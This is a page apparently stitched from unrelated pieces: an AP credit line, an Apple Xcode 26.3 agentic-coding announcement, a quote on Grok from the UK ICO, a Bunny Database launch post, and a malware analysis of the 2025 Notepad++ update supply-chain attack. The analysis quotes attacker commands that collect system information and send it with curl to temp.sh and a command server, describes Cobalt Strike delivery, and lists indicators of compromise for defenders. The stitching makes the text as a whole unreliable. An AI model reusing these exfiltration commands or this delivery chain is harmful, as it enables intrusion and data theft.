Associated Press writ­ers Nicolas Vaux-Montagny in Lyon, France, Mike Corder in The Hague, Netherlands, Sylvia Hui and Kelvin Chan in London con­tributed to this re­port.

Developers can lever­age cod­ing agents, in­clud­ing Anthropic’s Claude Agent and OpenAI’s Codex, di­rectly in Xcode to tackle com­plex tasks au­tonomously, help­ing them de­velop apps faster than ever

Xcode 26.3 in­tro­duces sup­port for agen­tic cod­ing, a new way in Xcode for de­vel­op­ers to build apps us­ing cod­ing agents such as Anthropic’s Claude Agent and OpenAI’s Codex. With agen­tic cod­ing, Xcode can work with greater au­ton­omy to­ward a de­vel­op­er’s goals — from break­ing down tasks to mak­ing de­ci­sions based on the pro­ject ar­chi­tec­ture and us­ing built-in tools.

Expanding on the in­tel­li­gence fea­tures in­tro­duced in Xcode 26, which brought a brand-new cod­ing as­sis­tant for writ­ing and edit­ing in Swift, this re­lease gives cod­ing agents ac­cess to even more of Xcode’s ca­pa­bil­i­ties. Agents like Claude Agent and Codex can now col­lab­o­rate through­out the en­tire de­vel­op­ment life cy­cle, giv­ing de­vel­op­ers the power to stream­line work­flows, it­er­ate faster, and bring ideas to life like never be­fore. Agents can search doc­u­men­ta­tion, ex­plore file struc­tures, up­date pro­ject set­tings, and ver­ify their work vi­su­ally by cap­tur­ing Xcode Previews and it­er­at­ing through builds and fixes.

“At Apple, our goal is to make tools that put in­dus­try-lead­ing tech­nolo­gies di­rectly in de­vel­op­ers’ hands so they can build the very best apps,” said Susan Prescott, Apple’s vice pres­i­dent of Worldwide Developer Relations. “Agentic cod­ing su­per­charges pro­duc­tiv­ity and cre­ativ­ity, stream­lin­ing the de­vel­op­ment work­flow so de­vel­op­ers can fo­cus on in­no­va­tion.”

With seam­less ac­cess to Claude Agent and Codex, de­vel­op­ers can bring the ad­vanced rea­son­ing of these mod­els di­rectly into their app-build­ing work­flow.1 This con­nec­tion com­bines the power of these agents with Xcode’s na­tive ca­pa­bil­i­ties to pro­vide the best re­sults when de­vel­op­ing for Apple plat­forms, giv­ing de­vel­op­ers the flex­i­bil­ity to work with the model that best fits their pro­ject.

In ad­di­tion to these built-in in­te­gra­tions, Xcode 26.3 makes its ca­pa­bil­i­ties avail­able through the Model Context Protocol, an open stan­dard that gives de­vel­op­ers the flex­i­bil­ity to use any com­pat­i­ble agent or tool with Xcode.

Xcode 26.3 is avail­able as a re­lease can­di­date for all mem­bers of the Apple Developer Program start­ing to­day, with a re­lease com­ing soon on the App Store.

Anthropic and OpenAI’s terms of ser­vice may ap­ply.

“The re­ports about Grok raise deeply trou­bling ques­tions about how peo­ple’s per­sonal data has been used to gen­er­ate in­ti­mate or sex­u­alised im­ages with­out their knowl­edge or con­sent, and whether the nec­es­sary safe­guards were put in place to pre­vent this,” said William Malcolm, the ICO’s ex­ec­u­tive di­rec­tor for reg­u­la­tory risk & in­no­va­tion.

Meet Bunny Database: the SQL ser­vice that just works­Don’t want to babysit your app data­base on a VM but not will­ing to pay the DBaaS tax ei­ther? We’re build­ing a third way. Today, we’re launch­ing Bunny Database as a pub­lic pre­view: a SQLite-compatible man­aged ser­vice that spins down when idle, keeps la­tency low wher­ever your users are, and does­n’t cost a for­tune.So what’s the deal with data­base ser­vices in 2026?It’s be­come clear by now that the DBaaS plat­forms that gar­nered the love of so many devs are all go­ing up­mar­ket. Removing or dumb­ing down free tiers, charg­ing for un­used ca­pac­ity, charg­ing ex­tra for small fea­tures, or bundling them in higher tiers — you al­ready know the drill.Hard to blame any­one for grow­ing their busi­ness, but it does­n’t feel right when these ser­vices stop mak­ing sense for the very peo­ple who helped pop­u­lar­ize them in the first place.So where does that leave you?Like SQLite, but for the web­Not every pro­ject needs Postgres, and that’s okay. Sometimes you just want a sim­ple, re­li­able data­base that you can spin up quickly and build on, with­out wor­ry­ing it’ll hit your wal­let like an EC2.That’s what we built Bunny Database for.What you get:One-click de­ploy­ment: just name your data­base and go, no con­fig need­ed­Lan­guage-spe­cific tool­ing: SDKs for TS/JS, Go, Rust, and .NET help you han­dle the bor­ing bit­sLow la­tency any­where: repli­ca­tion re­gions let you serve reads close to your user­sWorks over HTTP: wire up any­thing you’d like­Data­base ed­i­tor: in­sert data or run queries on the spotAfford­able, pay-as-you-go pric­ing: only pay for what you use, but with­out the server­less taxGet the full tour in­clud­ing how to con­nect Bunny Database to your app in this quick demo from our DX Engineer, Jamie Barton:

Why care about data­base la­tency any­way?You prob­a­bly op­ti­mize the heck out of your fron­tend, APIs, and caching lay­ers, all for the sake of de­liv­er­ing an ex­pe­ri­ence that feels in­stant to your users. But when your data­base is far away from them, round-trip time starts to add no­tice­able la­tency.The usual fix is to in­tro­duce more caching lay­ers, de­nor­mal­ized reads, or other workarounds. That’s ob­vi­ously no fun.And when you think about it, devs end up do­ing this be­cause the pop­u­lar DBaaS plat­forms are usu­ally ei­ther lim­ited, com­plex, or too costly when it comes to multi-re­gion de­ploy­ments. So what looks like a caching prob­lem is ac­tu­ally a data lo­cal­ity is­sue.OK, but how bad can it re­ally be?To find out, we ran a read la­tency bench­mark and mea­sured p95 la­tency in Bunny Database.We picked a num­ber of re­gions across the world and com­pared round-trip time for client lo­ca­tions ever far­ther away from the data­base in:Turns out serv­ing reads close to clients re­duced la­tency by up to 99%.Check out the full write-up on the bench­mark setup and re­sults here.While this def­i­nitely mat­ters most to apps with global users, data lo­cal­ity does ap­ply to every­one. With Bunny Database, you don’t have to stick to ma­jor data cen­ter lo­ca­tions and com­pen­sate with caching workarounds any more. Instead, you get a lot of flex­i­bil­ity to set up re­gions in an in­tu­itive in­ter­face and it’s easy to switch things up as your re­quire­ments change.Au­to­matic re­gion se­lec­tion gives you one-click de­ploy­ment with min­i­mal la­tency. Bunny Database will se­lect re­gions for you based on your IP ad­dress (you can check and tweak the se­lec­tion in set­tings later).Sin­gle-re­gion de­ploy­ment lets you pick one of 41 re­gions avail­able world­wide (check the full list here).Man­ual re­gion se­lec­tion gives you cus­tom multi-re­gion setup, where you can freely pick re­gions that make the most sense for your au­di­ence.All of this lets you start wher­ever you’d like and add re­gions as needed, with­out re-ar­chi­tect­ing your app.Us­age-based pric­ing, but with­out the server­less taxIn the data­base world, ca­pac­ity-based pric­ing gives you some pre­dictabil­ity. But no one likes to pay for un­used ca­pac­ity, right?Server­less, on the other hand, is sup­posed to be cost-ef­fi­cient, yet can rack up bills quickly, es­pe­cially when the DBaaS charges sig­nif­i­cant markups on top of al­ready pricey com­pute.We don’t do hy­per­scalers, though, so we can charge a fair price for Bunny Database in a us­age-based model.When not get­ting re­quests, Bunny Database only in­curs stor­age costs. One pri­mary re­gion is charged con­tin­u­ously, while read repli­cas only add stor­age costs when serv­ing traf­fic (metered by the hour)Your us­age is charged con­tin­u­ously (pay-as-you-go) and in­voiced month­ly­Dur­ing the pub­lic pre­view phase, Bunny Database is free.Wait, what does “SQLite-compatible” ac­tu­ally mean?Bunny Database would­n’t be pos­si­ble with­out lib­SQL, the open-source, open-con­tri­bu­tion fork of SQLite cre­ated by Turso.We run Bunny Database on our own fork of lib­SQL, which gives us the free­dom to in­te­grate it tightly with the bunny.net plat­form and han­dle the in­fra­struc­ture and or­ches­tra­tion needed to run it as a man­aged, multi-re­gion ser­vice.What does this mean for Bunny Database’s up­stream fea­ture par­ity with lib­SQL and SQLite, re­spec­tively?The short an­swer is that we don’t cur­rently promise au­to­matic or com­plete fea­ture par­ity with ei­ther up­stream lib­SQL or the lat­est SQLite re­leases.While lib­SQL aims to stay com­pat­i­ble with SQLite’s API and file for­mat, it does­n’t move in lock­step with up­stream SQLite. We would­n’t ex­pect oth­er­wise, es­pe­cially as Turso has shifted fo­cus from lib­SQL to­ward a long-term rewrite of SQLite in Rust.For Bunny Database, this means that com­pat­i­bil­ity to­day is de­fined by the lib­SQL ver­sion we’re built on, rather than by chas­ing every up­stream SQLite or lib­SQL change as it lands. We haven’t pulled in any up­stream changes yet, and we don’t cur­rently treat up­stream par­ity as an au­to­matic goal.That’s in­ten­tional. Our fo­cus so far has been on mak­ing Bunny Database re­li­able and easy to op­er­ate as a ser­vice. We think bring­ing in up­stream changes only makes sense when they clearly im­prove real-world use cases, not just to tick a par­ity check­box.If there are spe­cific lib­SQL fea­tures you’d like to see ex­posed in Bunny Database, or re­cent SQLite fea­tures you’d want us to pull in, we’d love to hear about it. Join our Discord to dis­cuss your use cases and help shape the roadmap!Speak­ing of the roadmap, we don’t stop cook­ing. Here’s what’s com­ing up next:There’s even more to come, but it’s too soon to spill the beans yet, es­pe­cially while we’re in pub­lic pre­view. We’d love to hear your feed­back, so we can shape what ships next to­gether.Bunny Database works stand­alone and fits right into your stack via the SDKs (or you can hook up any­thing us­ing the HTTP API). But it also plays nicely with Bunny Edge Scripting and Bunny Magic Containers.To con­nect your data­base to an Edge Script or a Magic Containers app, sim­ply go to the Access tab of the cho­sen data­base and click Generate Tokens to cre­ate new ac­cess cre­den­tials for it.Once they’re gen­er­ated, you’ll get two paths to choose from:Click Add Secrets to an Edge Script and se­lect the one you’d like to con­nect from the list. You’ll also need to im­port the lib­SQL TypeScript client and use the pro­vided code snip­pet to con­nect it to your data­base.Click Add Secrets to Magic Container App and se­lect the one you’d like to con­nect from the list. You’ll also need to con­nect to the data­base from your app us­ing one of the client li­braries or the HTTP API.After you com­plete the setup, the data­base URL and ac­cess to­ken will be avail­able as en­vi­ron­ment vari­ables in your script or app. Use them to con­nect to your data­base:

You can find more de­tailed, step-by-step in­te­gra­tion in­struc­tions in the docs:We can’t wait to see what you’ll build with Bunny Database and what you think of it. During the pub­lic pre­view phase, you get 50 data­bases per user ac­count, each capped at 1 GB, but we hope this should be more than enough for lots of fun pro­jects.Just sign in to the bunny.net dash­board to get started. Happy build­ing!

On February 2, 2026, the de­vel­op­ers of Notepad++, a text ed­i­tor pop­u­lar among de­vel­op­ers, pub­lished a state­ment claim­ing that the up­date in­fra­struc­ture of Notepad++ has been com­pro­mised. According to the state­ment, this was due to a host­ing provider level in­ci­dent, which oc­curred from June to September 2025. However, at­tack­ers were able to re­tain ac­cess to in­ter­nal ser­vices un­til December 2025.

Having checked our teleme­try re­lated to this in­ci­dent, we have been amazed to find out how dif­fer­ent and unique were the ex­e­cu­tion chains used in this sup­ply chain at­tack. We iden­ti­fied that over the course of four months, from July to October 2025, at­tack­ers who have com­pro­mised Notepad++ have been con­stantly ro­tat­ing C2 server ad­dresses used for dis­trib­ut­ing ma­li­cious up­dates, the down­load­ers used for im­plant de­liv­ery, as well as the fi­nal pay­loads.

We ob­served three dif­fer­ent in­fec­tion chains over­all de­signed to at­tack about a dozen ma­chines, be­long­ing to:

* An IT ser­vice provider or­ga­ni­za­tion lo­cated in Vietnam.

Despite the va­ri­ety of pay­loads ob­served, Kaspersky so­lu­tions have been able to block the iden­ti­fied at­tacks as they oc­curred.

In this ar­ti­cle, we de­scribe the va­ri­ety of the in­fec­tion chains we ob­served in the Notepad++ sup­ply chain at­tack, as well as pro­vide nu­mer­ous pre­vi­ously un­pub­lished IoCs re­lated to it.

We ob­served at­tack­ers to de­ploy a ma­li­cious Notepad++ up­date for the first time in late July 2025. It was hosted at http://​45.76.155[.]202/​up­date/​up­date.exe. Notably, the first scan of this URL on the VirusTotal plat­form oc­curred in late September, by a user from Taiwan.

The up­date.exe file down­loaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the le­git­i­mate Notepad++ up­dater process, GUP.exe. This file turned out to be a NSIS in­staller, of about 1 MB in size. When started, it sends a heart­beat con­tain­ing sys­tem in­for­ma­tion to the at­tack­ers. This is done through the fol­low­ing steps:

The file cre­ates a di­rec­tory named %appdata%\ProShow and sets it as the cur­rent di­rec­tory;

It ex­e­cutes the shell com­mand cmd /c whoami&&tasklist > 1.txt, thus cre­at­ing a file with the shell com­mand ex­e­cu­tion re­sults in the %appdata%\ProShow di­rec­tory;

Then it up­loads the 1.txt file to the temp[.]sh host­ing ser­vice by ex­e­cut­ing the curl.exe -F “file=@1.txt” -s https://​temp.sh/​up­load com­mand;

Next, it sends the URL to the up­loaded 1.txt file by us­ing the curl.exe –user-agent “https://​temp.sh/​ZM­RKV/​1.txt” -s http://​45.76.155[.]202 shell com­mand. As can be ob­served, the up­loaded file URL is trans­ferred in­side the user agent.

Notably, the same be­hav­ior of ma­li­cious Notepad++ up­dates, specif­i­cally the launch of shell com­mands and the use of the temp[.]sh web­site for file up­load­ing, has been de­scribed on the Notepad++ com­mu­nity fo­rums by a user named soft-pars­ley.

After send­ing sys­tem in­for­ma­tion, the up­date.exe file ex­e­cutes the sec­ond-stage pay­load. To do that, it per­forms the fol­low­ing ac­tions:

* Drops the fol­low­ing files to the %appdata%\ProShow di­rec­tory:

The launched ProShow.exe file is a le­git­i­mate ProShow soft­ware, which is abused to launch a ma­li­cious pay­load. Normally, when threat ac­tors aim to ex­e­cute a ma­li­cious pay­load in­side a le­git­i­mate process, they re­sort to the DLL side­load­ing tech­nique. However, this time at­tack­ers have de­cided to avoid us­ing it — likely due to how much at­ten­tion this tech­nique re­ceives nowa­days. Instead, they abused an old, known vul­ner­a­bil­ity in the ProShow soft­ware, which dates back to early 2010s. The dropped file named load con­tains an ex­ploit pay­load, which is launched when the ProShow.exe file is launched. It is worth not­ing that, apart from this pay­load, all files in the %appdata%\ProShow di­rec­tory are le­git­i­mate.

Analysis of the ex­ploit pay­load re­vealed that it con­tains two shell­codes — one at the very start and the other one in the mid­dle of the file. The shell­code lo­cated at the start of the file con­tains a set of mean­ing­less in­struc­tions and is not de­signed to be ex­e­cuted — rather, at­tack­ers used it as the ex­ploit padding bytes. It is likely that, by us­ing a fake shell­code for padding bytes in­stead of some­thing else (e.g., a se­quence of 0x41 char­ac­ters or ran­dom bytes), at­tack­ers aimed to con­fuse re­searchers and au­to­mated analy­sis sys­tems.

The sec­ond shell­code, which is stored in the mid­dle of the file, is the one that is launched when ProShow.exe is started. It de­crypts a Metasploit down­loader pay­load that re­trieves a Cobalt Strike Beacon shell­code from the URL https://​45.77.31[.]210/​users/​ad­min (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.

The Cobalt Strike Beacon pay­load is de­signed to com­mu­ni­cate with the cd­ncheck.it[.]com C2 server. For in­stance, it uses the GET re­quest URL https://​45.77.31[.]210/​api/​up­date/​v1 and the POST re­quest URL https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit.

Later on, in early August 2025, we have ob­served at­tack­ers to use the same down­load URL for the up­date.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same ex­e­cu­tion chain for de­liv­ery of Cobalt Strike Beacon via ma­li­cious Notepad++ up­dates. However, we noted the fol­low­ing dif­fer­ences:

* In the Metasploit down­loader pay­load, the URL for down­load­ing Cobalt Strike Beacon was set to https://​cd­ncheck.it[.]com/​users/​ad­min;

* The Cobalt Strike C2 server URLs were set to https://​cd­ncheck.it[.]com/​api/​up­date/​v1 and https://​cd­ncheck.it[.]com/​api/​Meta­data/​sub­mit.

We have not fur­ther seen any in­fec­tions lever­ag­ing chain #1 af­ter early August 2025.

A month and a half af­ter ma­li­cious up­date de­tec­tions ceased, we ob­served at­tack­ers to re­sume de­ploy­ing these up­dates in the mid­dle of September 2025, us­ing an­other in­fec­tion chain. The ma­li­cious up­date was still be­ing dis­trib­uted from the http://​45.76.155[.]202/​up­date/​up­date.exe URL, and the file down­loaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS in­staller as well. However, its file size was now about 140 KB. Again, this file per­formed two ac­tions:

* Obtained sys­tem in­for­ma­tion by ex­e­cut­ing a shell com­mand and up­load­ing its ex­e­cu­tion re­sults to temp[.]sh;

* Dropped a next-stage pay­load on disk and launched it.

Regarding sys­tem in­for­ma­tion, at­tack­ers made the fol­low­ing changes to how it was col­lected:

* They changed the work­ing di­rec­tory to %APPDATA%\Adobe\Scripts;

* They started col­lect­ing more sys­tem in­for­ma­tion de­tails, chang­ing the ex­e­cuted shell com­mand to cmd /c “whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt.

The cre­ated a.txt file was, just as in the case of stage #1, up­loaded to the temp[.]sh web­site through curl, with the ob­tained temp[.]sh URL be­ing trans­ferred to the same http://​45.76.155[.]202/​list end­point, in­side the User-Agent header.

As for the next-stage pay­load, it has been changed com­pletely. The NSIS in­staller was con­fig­ured to drop the fol­low­ing files to the %APPDATA%\Adobe\Scripts di­rec­tory:

Next, it ex­e­cutes the fol­low­ing shell com­mand to launch the script.exe file: %APPDATA%\%Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.

All of the files in the %APPDATA%\Adobe\Scripts di­rec­tory, ex­cept for alien.ini, are le­git­i­mate and re­lated to the Lua in­ter­preter. As such, the pre­vi­ously men­tioned com­mand is used by at­tack­ers to launch a com­piled Lua script, lo­cated in the alien.ini file. Below is a screen­shot of its de­com­pi­la­tion:

As we can see, this small script is used for plac­ing shell­code in­side ex­e­cutable mem­ory and then launch­ing it through the EnumWindowStationsW API func­tion.

The launched shell­code is, just in the case of chain #1, a Metasploit down­loader, which down­loads a Cobalt Strike Beacon pay­load, again in the form of a shell­code, from the https://​cd­ncheck.it[.]com/​users/​ad­min URL.

The Cobalt Strike pay­load con­tains the C2 server URLs that slightly dif­fer from the ones seen pre­vi­ously: https://​cd­ncheck.it[.]com/​api/​get­Info/​v1 and https://​cd­ncheck.it[.]com/​api/​File­U­pload/​sub­mit.

Attacks in­volv­ing chain #2 con­tin­ued un­til the end of September, when we ob­served two more ma­li­cious up­date.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon pay­load de­liv­ered through it was con­fig­ured to use the same URLs ob­served in mid-Sep­tem­ber, how­ever, at­tack­ers changed the way sys­tem in­for­ma­tion was col­lected. Specifically, at­tack­ers split the sin­gle shell com­mand they used for this (cmd /c “whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt) into mul­ti­ple com­mands:

Notably, the same se­quence of com­mands has been pre­vi­ously doc­u­mented by the soft-pars­ley user on the Notepad++ com­mu­nity fo­rums.

The other up­date.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. Using it, at­tack­ers per­formed the fol­low­ing:

* Changed the user agent used in HTTP re­quests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;

* Changed the URL used by the Metasploit down­loader to https://​safe-dns.it[.]com/​help/​Get-Start;

* Changed the Cobalt Strike Beacon C2 server URLs to https://​safe-dns.it[.]com/​re­solve and https://​safe-dns.it[.]com/​dns-query.

In early October 2025, at­tack­ers changed the in­fec­tion chain once again. They have as well changed the C2 server for dis­trib­ut­ing ma­li­cious up­dates, with the ob­served up­date URL be­ing http://​45.32.144[.]255/​up­date/​up­date.exe. The pay­load down­loaded (SHA1: d7ffd7b588880cf61b603346a3557e7c­ce648c93) was still a NSIS in­staller, how­ever, un­like in the case of chains 1 and 2, this in­staller did not in­clude the sys­tem in­for­ma­tion send­ing func­tion­al­ity. It sim­ply dropped the fol­low­ing files to the %appdata%\Bluetooth\ di­rec­tory:

This ex­e­cu­tion chain re­lies on the side­load­ing of the log.dll file, which is re­spon­si­ble for launch­ing the en­crypted BluetoothService shell­code into the BluetoothService.exe process. Notably, such ex­e­cu­tion chains are com­monly used by Chinese-speaking threat ac­tors. This par­tic­u­lar ex­e­cu­tion chain has al­ready been de­scribed by Rapid7, and the fi­nal pay­load ob­served in it is the cus­tom Chrysalis back­door.

Unlike the pre­vi­ous chains, chain #3 does not load a Cobalt Strike Beacon di­rectly. However, in their ar­ti­cle Rapid7 claim that they ad­di­tion­ally ob­served a Cobalt Strike Beacon pay­load be­ing de­ployed to the C:\ProgramData\USOShared folder, while con­duct­ing in­ci­dent re­sponse on one of the ma­chines in­fected with the Notepad++ sup­ply chain at­tack. Whilst Rapid7 does not de­tail how this file was dropped to the vic­tim ma­chine, we can high­light the fol­low­ing sim­i­lar­i­ties be­tween that Beacon pay­load and the Beacon pay­loads ob­served in chains #1 and #2:

In both cases, Beacons are loaded through a Metasploit down­loader shell­code, with sim­i­lar URLs used (api.wires­guard.com/​users/​ad­min for the Rapid7 pay­load, cd­ncheck.it.com/​users/​ad­min and http://​45.77.31[.]210/​users/​ad­min for chain #1 and chain #2 pay­loads);

The Beacon con­fig­u­ra­tions are en­crypted with the XOR key CRAZY;

Similar C2 server URLs are used for Cobalt Strike Beacon com­mu­ni­ca­tions (i.e. api.wires­guard.com/​api/​File­U­pload/​sub­mit for the Rapid7 pay­load and https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit for the chain #1 pay­load).

In mid-Oc­to­ber 2025, we ob­served at­tack­ers to re­sume de­ploy­ments of the chain #2 pay­load (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) us­ing yet an­other URL: http://​95.179.213[.]0/​up­date/​up­date.exe. Still, this pay­load used the pre­vi­ously men­tioned self-dns.it[.]com and safe-dns.it[.]com do­main names for sys­tem in­for­ma­tion up­load­ing, Metasploit down­loader and Cobalt Strike Beacon com­mu­ni­ca­tions.

Further in late October 2025, we ob­served at­tack­ers to start chang­ing URLs used for ma­li­cious up­date de­liv­er­ies. Specifically, at­tack­ers started us­ing the fol­low­ing URLs:

We haven’t ob­served any new pay­loads de­ployed from these URLs — they in­volved us­age of both #2 and #3 ex­e­cu­tion chains. Finally, we have not seen any pay­loads be­ing de­ployed start­ing from November 2025.

Notepad++ is a text ed­i­tor used by nu­mer­ous de­vel­op­ers. As such, the abil­ity to con­trol up­date servers of this soft­ware gave at­tack­ers a unique pos­si­bil­ity to break into ma­chines of high-pro­file or­ga­ni­za­tions around the world. The at­tack­ers made an ef­fort to avoid los­ing ac­cess to this in­fec­tion vec­tor — they were spread­ing the ma­li­cious im­plants in a tar­geted man­ner, and they were skilled enough to dras­ti­cally change the in­fec­tion chains about once a month. Whilst we iden­ti­fied three dis­tinct in­fec­tion chains dur­ing our in­ves­ti­ga­tion, we would not be sur­prised to see more of them in use. To sum up our find­ings, here is the over­all time­line of the in­fec­tion chains that we iden­ti­fied:

The va­ri­ety of in­fec­tion chains makes de­tec­tion of the Notepad++ sup­ply chain at­tack quite a dif­fi­cult and at the same time cre­ative task. We would like to pro­pose the fol­low­ing meth­ods, from generic to spe­cific, to hunt down traces of this at­tack:

* Check sys­tems for de­ploy­ments of NSIS in­stallers, which have been used in all three ob­served ex­e­cu­tion chains. For ex­am­ple, this can be done by look­ing for logs re­lated to cre­ations of the %localappdata%\Temp\ns.tmp di­rec­tory, made by NSIS in­stallers at run­time. Make sure to in­ves­ti­gate the ori­gins of each iden­ti­fied NSIS in­staller to avoid false pos­i­tives;

* Check net­work traf­fic logs for DNS res­o­lu­tions of the temp[.]sh do­main, which is un­usual to ob­serve in cor­po­rate en­vi­ron­ments. Also, it is ben­e­fi­cial to con­duct a check for raw HTTP traf­fic re­quests that have a temp[.]sh URL em­bed­ded in the user agent — both these steps will make it pos­si­ble to de­tect chain #1 and chain #2 de­ploy­ments;

* Check sys­tems for launches of ma­li­cious shell com­mands ref­er­enced in the ar­ti­cle, such as whoami, tasklist, sys­tem­info and net­stat -ano;

* Use spe­cific IoCs listed be­low to iden­tify known ma­li­cious do­mains and files.

URLs used by Metasploit down­load­ers to de­ploy Cobalt Strike bea­cons

https://​45.77.31[.]210/​users/​ad­min

https://​cd­ncheck.it[.]com/​users/​ad­min

https://​safe-dns.it[.]com/​help/​Get-Start

URLs used by Cobalt Strike Beacons de­liv­ered by ma­li­cious Notepad++ up­daters

https://​45.77.31[.]210/​api/​up­date/​v1

https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit

https://​cd­ncheck.it[.]com/​api/​up­date/​v1

https://​cd­ncheck.it[.]com/​api/​Meta­data/​sub­mit

https://​cd­ncheck.it[.]com/​api/​get­Info/​v1

https://​cd­ncheck.it[.]com/​api/​File­U­pload/​sub­mit

https://​safe-dns.it[.]com/​re­solve

https://​safe-dns.it[.]com/​dns-query

URLs used by the Chrysalis back­door and the Cobalt Strike Beacon pay­loads as­so­ci­ated with it, as pre­vi­ously iden­ti­fied by Rapid7

https://​api.sky­cloud­cen­ter[.]com/​a/​chat/​s/​70521ddf-a2ef-4adf-9cf0-6d8e24aaa821

https://​api.wires­guard[.]com/​up­date/​v1

https://​api.wires­guard[.]com/​api/​File­U­pload/​sub­mit

URLs re­lated to Cobalt Strike Beacons up­loaded to mul­ti­scan­ners, as pre­vi­ously iden­ti­fied by Rapid7

http://​59.110.7[.]32:8880/​uffhx­pSy

http://​59.110.7[.]32:8880/​api/​get­Ba­sicInfo/​v1

http://​59.110.7[.]32:8880/​api/​Meta­data/​sub­mit

http://​124.222.137[.]114:9999/​3yZR31VK

http://​124.222.137[.]114:9999/​api/​up­dat­eS­ta­tus/​v1

http://​124.222.137[.]114:9999/​api/​Info/​sub­mit

https://​api.wires­guard[.]com/​users/​sys­tem

https://​api.wires­guard[.]com/​api/​get­Info/​v1